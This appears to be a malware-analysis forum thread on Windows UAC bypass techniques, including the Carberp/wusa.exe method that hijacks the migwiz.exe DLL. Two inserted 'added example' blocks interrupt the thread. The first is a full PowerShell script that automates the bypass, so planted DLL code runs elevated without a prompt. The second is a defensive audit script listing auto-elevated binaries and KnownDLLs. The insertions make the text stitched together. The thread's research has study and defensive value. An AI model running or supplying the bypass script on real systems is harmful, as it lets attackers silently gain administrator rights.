A forum for reverse engineering, OS internals and malware analysis 

 #25525  by ebfe
 Sat Mar 28, 2015 1:21 pm
There is another UAC bypass method used in Carberp malware: https://github.com/hzeroo/Carberp/blob/ ... bypass.cpp

Steps to reproduce:
1. Make a .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

This method is also mentioned here: https://www.syscan360.org/slides/2013_E ... truder.pdf
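The three reproduction steps above, written out as one PowerShell script. This is an added example, not code from the thread or from the Carberp repository. It assumes (none of this is on the page) that the proxy DLL has already been built and saved as cryptbase.dll next to the script, that the target build still ships %WINDIR%\system32\migwiz\migwiz.exe, and that its wusa.exe still honours /extract (later Windows 10 builds removed that switch, which is why the script checks that the DLL actually landed before running migwiz.exe):

```powershell
# Added example: Carberp/migwiz UAC bypass steps as a script (not from the thread).
# Assumptions: .\cryptbase.dll is the attacker-built DLL; Windows 7/8.x-era build where
# wusa.exe is auto-elevated, supports /extract, and migwiz.exe exists in its own directory.
$ErrorActionPreference = 'Stop'

$dll    = Join-Path $PSScriptRoot 'cryptbase.dll'   # attacker-supplied DLL (assumption)
$cab    = Join-Path $env:TEMP 'package.cab'
$msu    = Join-Path $env:TEMP 'package.msu'
$target = Join-Path $env:WINDIR 'system32\migwiz'

if (-not (Test-Path $dll)) { throw "Build cryptbase.dll first: $dll not found" }
if (-not (Test-Path (Join-Path $target 'migwiz.exe'))) {
    throw "migwiz.exe is not present in $target; this method does not apply to this build"
}

# Step 1: pack the DLL into a cabinet with makecab.exe (ships with Windows) and rename
# the result to .MSU, which is the extension wusa.exe expects.
& makecab.exe $dll $cab | Out-Null
Move-Item -Force $cab $msu

# Step 2: wusa.exe is on the auto-elevate list on the affected builds, so /extract writes
# into the protected directory with no UAC prompt (/quiet suppresses its UI).
Start-Process -FilePath "$env:WINDIR\system32\wusa.exe" `
    -ArgumentList "`"$msu`" /quiet /extract:`"$target`"" -Wait

if (-not (Test-Path (Join-Path $target 'cryptbase.dll'))) {
    throw "extraction failed; wusa.exe on this build may no longer support /extract"
}

# Step 3: migwiz.exe (HighestAvailable, auto-elevated) resolves cryptbase.dll through the
# normal search order, so the copy in its own directory wins over the one in system32 and
# the planted DLL runs in the elevated process.
Start-Process -FilePath (Join-Path $target 'migwiz.exe')
```

Nothing here survives a build where cryptbase.dll is in KnownDLLs or where migwiz.exe is missing, which is exactly the variation between Windows versions the rest of the thread discusses.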
 #25526  by EP_X0FF
 Sat Mar 28, 2015 2:06 pm
Yes, I'm aware of it and skipped it because Carberp is open-source.

Have you tried it with recent Windows? Is it still working on 8/8.1/10? If so I may consider adding it too, after a remake, because the Carberp source is trash.
 #25530  by R00tKit
 Sun Mar 29, 2015 6:51 am
InfDefaultInstall.exe UAC bypass (when UAC is on)
With InfDefaultInstall.exe we can install any service in the registry and copy a file to a privileged path without any alert or UAC prompt.
I shared this method with @EP_X0FF in PM and it works on 7 and 8, but I can't check 10.
 #25531  by EP_X0FF
 Sun Mar 29, 2015 7:31 am
The problem with the Carberp method is that they use the "ehome" directory and mcx2prov.exe as the target, which are present only on old Windows installs with Media Center components. However, as stated above, we can use migwiz, which is very well suited to this method. It has "HighestAvailable" access defined in its manifest, sits in a standalone directory "migwiz", loads DLLs from system32 and has no embedded-manifest DLL redirection, which makes it vulnerable to DLL hijacking. However, it is absent in Windows 10 TP 10041; unsure if it was redesigned or just removed from Preview builds. It is still present in the APPINFO whitelist, however.

edit: I've updated UACMe to include tweaked Carberp method mentioned by ebfe.
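The post above lists the properties that make migwiz.exe a good target (auto-elevation, HighestAvailable, its own directory, DLLs resolved from disk rather than KnownDLLs), and later posts note that Microsoft removes autoElevate from some binaries (sdbinst.exe) and moves DLLs into KnownDLLs (shcore.dll). The following audit script is an added example, not part of the thread or of UACMe: run unelevated, it scans the executables in %WINDIR%\system32 and its immediate sub-directories, reports which ones carry an autoElevate=true manifest and what requestedExecutionLevel they declare, flags those that sit in their own sub-directory, and checks whether the DLL names mentioned in this thread are protected by KnownDLLs on the machine it runs on. The byte-scan of the embedded manifest is a shortcut that assumes the manifest is stored as plain UTF-8 XML in the PE resource section, which is the normal case but not guaranteed:

```powershell
# Added example (not from the thread): audit auto-elevated executables and KnownDLLs.
# Read-only: it touches files in system32 and one registry key, nothing else.
$sys32 = Join-Path $env:WINDIR 'system32'
$hijackCandidates = 'cryptbase.dll', 'wdscore.dll', 'shcore.dll'   # names used in this thread

# KnownDLLs are mapped from pre-created section objects instead of being searched on disk,
# so a DLL listed here cannot be hijacked by dropping a copy next to the executable.
$kdKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
$skip    = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider', 'DllDirectory', 'DllDirectory32'
$knownDlls = (Get-ItemProperty $kdKey).PSObject.Properties |
    Where-Object { $_.Name -notin $skip } |
    ForEach-Object { $_.Value.ToString().ToLower() }

function Get-ManifestInfo {
    param([string]$Path)
    # The RT_MANIFEST resource is UTF-8 XML embedded in the PE, so a byte scan finds it
    # (assumption; a proper tool would walk the resource directory instead).
    $text = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes($Path))
    $m = [regex]::Match($text, '<assembly[\s\S]*?</assembly>')
    if (-not $m.Success) { return $null }
    $xml = $m.Value
    [pscustomobject]@{
        AutoElevate = [bool]($xml -match '<autoElevate>\s*true\s*</autoElevate>')
        # A manifest without requestedExecutionLevel behaves as asInvoker.
        Level       = if ($xml -match 'level\s*=\s*"([^"]+)"') { $Matches[1] } else { 'asInvoker' }
    }
}

$exes = Get-ChildItem -Path "$sys32\*.exe", "$sys32\*\*.exe" -File -ErrorAction SilentlyContinue
$results = foreach ($exe in $exes) {
    try { $info = Get-ManifestInfo $exe.FullName } catch { continue }
    if ($null -eq $info -or -not $info.AutoElevate) { continue }
    [pscustomobject]@{
        Executable = $exe.FullName
        Level      = $info.Level
        # Own directory: a planted DLL there shadows the system32 copy for this binary
        # only, which is what made the migwiz directory convenient for the wusa trick.
        OwnDir     = $exe.DirectoryName -ne $sys32
    }
}

$results | Sort-Object OwnDir, Executable -Descending | Format-Table -AutoSize

"`nKnownDLLs status for the DLL names used in this thread:"
foreach ($name in $hijackCandidates) {
    $status = if ($knownDlls -contains $name) { 'in KnownDLLs (app-directory hijack blocked)' } else { 'not in KnownDLLs' }
    '{0,-14} {1}' -f $name, $status
}
```

Comparing the output across builds is the quickest way to confirm the kind of changes discussed below (a binary dropping autoElevate, or a DLL such as shcore.dll appearing in KnownDLLs) without reverse engineering each executable by hand.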
 #25542  by EP_X0FF
 Tue Mar 31, 2015 4:38 pm
kmd wrote: have you figured out why the Gootkit method doesn't work on Win10?
MS removed autoElevate from sdbinst.exe. You can try to make a hybrid of the Simda + Gootkit methods, bypass HKLM AppCompat key security, write the sdb settings manually, but I doubt it will work because NtApphelpCacheControl requires the caller to be Admin or System.

P.S.
Additionally, starting from builds > 9901 they moved shcore.dll to KnownDlls. However, Windows 10, even 10049, still contains multiple other unfixed UAC auto-elevation exploits.
 #25544  by EP_X0FF
 Wed Apr 01, 2015 4:29 am
Thanks for mentioning it.

This paragraph greatly disavows the quality of this article:

Davidson's proof-of-concept attack still works as of May 2011, almost two years after it was published, but we haven't seen any malware that takes advantage of that specific attack vector to increase privileges on a system.

Actually there were a lot of them, even in 2010. This means the author of this was unable to investigate the subject area before writing anything.

Next, printui.exe is at level requireAdministrator. You can't even launch the help (/?) command without triggering UAC.

Text is about 80% water, 1 useful screenshot and nothing more.